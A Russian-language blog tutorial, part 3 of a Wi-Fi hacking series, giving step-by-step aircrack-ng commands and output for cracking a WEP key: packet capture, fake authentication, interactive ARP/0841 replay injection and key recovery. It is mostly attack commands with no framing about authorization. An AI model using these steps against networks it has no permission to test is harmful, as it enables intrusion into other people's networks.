Цикл статей по анализу и взлому wi-fi сетей продолжается. Сегодня покажу вам еще один метод взлома.
Первое, что делаем переводим интерфейс в режим монитора (monitor mode), как это делается читайте в статье “Взлом Wi-Fi сети (WEP) – часть 1“.
Просматриваем wi-fi сети в радиусе действия.
# airodump-ng mon0
Теперь настроимся на нашу wi-fi сеть.
# airodump-ng -c 1 -w wep_0841 --bssid 00:22:B0:BE:75:3D mon0
- -c – номер канала
- -w – название дамп-файла
- –bssid – MAC-адрес точки доступа
Далее производим фиктивную аутентификацию – Fake authentication.
# aireplay-ng -1 0 -a 00:22:B0:BE:75:3D -h 00:C0:CA:30:85:7A mon0
- -1 – фиктивная аутентификация
- 0 – реассоциация времени (сек.)
- -a – MAC-адрес точки доступа
- -h – MAC-адрес клиента, который используем
14:21:29 Waiting for beacon frame (BSSID: 00:22:B0:BE:75:3D) on channel 1 14:21:29 Sending Authentication Request (Open System) [ACK] 14:21:29 Authentication successful 14:21:29 Sending Association Request 14:21:34 Sending Authentication Request (Open System) 14:21:36 Sending Authentication Request (Open System) 14:21:38 Sending Authentication Request (Open System) 14:21:40 Sending Authentication Request (Open System) 14:21:42 Sending Authentication Request (Open System) [ACK] 14:21:42 Authentication successful 14:21:42 Sending Association Request [ACK] 14:21:42 Association successful :-) (AID: 1)
Аутентификация прошла успешно. В столбце AUTH видна надпись OPN.
Далее используем Interactive packet replay (интерактивная генерация пакетов).
# aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:22:B0:BE:75:3D -h 00:C0:CA:30:85:7A mon0
- -2 – interactive replay attack
- -p 0841 – устанавливается Frame Control Field пакет, точно такой же, какой wi-fi клиент, в самом начале, отправляет точке доступа (AP)
- -c FF:FF:FF:FF:FF:FF – MAC-адрес становится широковещательным (помогает получать новые IV – вектора инициализации)
- -b – MAC-адрес точки доступа
- -h – MAC-адрес нашего wi-fi клиента
Read 21 packets... Size: 139, FromDS: 1, ToDS: 0 (WEP) BSSID = 00:22:B0:BE:75:3D Dest. MAC = FF:FF:FF:FF:FF:FF Source MAC = 00:C0:CA:30:85:7A 0x0000: 0842 0000 ffff ffff ffff 0022 b0be 753d .B........."..u= 0x0010: 00c0 ca30 857a 70ca 67aa 3500 4870 5b18 ...0.zp.g.5.Hp[. 0x0020: 9494 adae 329f a896 7eb3 e9c1 2db9 b151 ....2...~...-..Q 0x0030: 7f99 85eb 8d06 b6f6 6bc6 c651 3773 199c .......k..Q7s.. 0x0040: f4fe baff a285 5691 d915 8068 f6f0 ea4a ......V....h...J 0x0050: 057e 98c0 ae1a 89a7 c06e 5d0e 6538 2d84 .~.......n].e8-. 0x0060: 7105 5018 799e 56b7 78eb 7b58 9de3 5ca8 q.P.y.V.x.{X... 0x0070: 84bb 084c 4dad 6c1b cf74 987a 9250 3671 ...LM.l..t.z.P6q 0x0080: 7ae9 4ce7 509f bdbb 6ebb f4 z.L.P...n.. Use this packet ? y Saving chosen packet in replay_src-1223-142806.cap You should also start airodump-ng to capture replies. 351942 packets...(499 pps)
Когда накопится достаточное количество Data-пакетов, производим их расшифровку.
# aircrack-ng -a 1 -0 wep_0841.cap
- -a – bruto-force атака (1 = WEP, 2 = WPA/WPA2-PSK)
- 1 – WEP
- -0 – использовать цвет
Вот и все. Если возникнут вопросы, обращайтесь.
1 comments On Взлом Wi-Fi сети (WEP) – часть 3
Pingback: Как узнать SSID скрытой точки доступа - Cryptoworld ()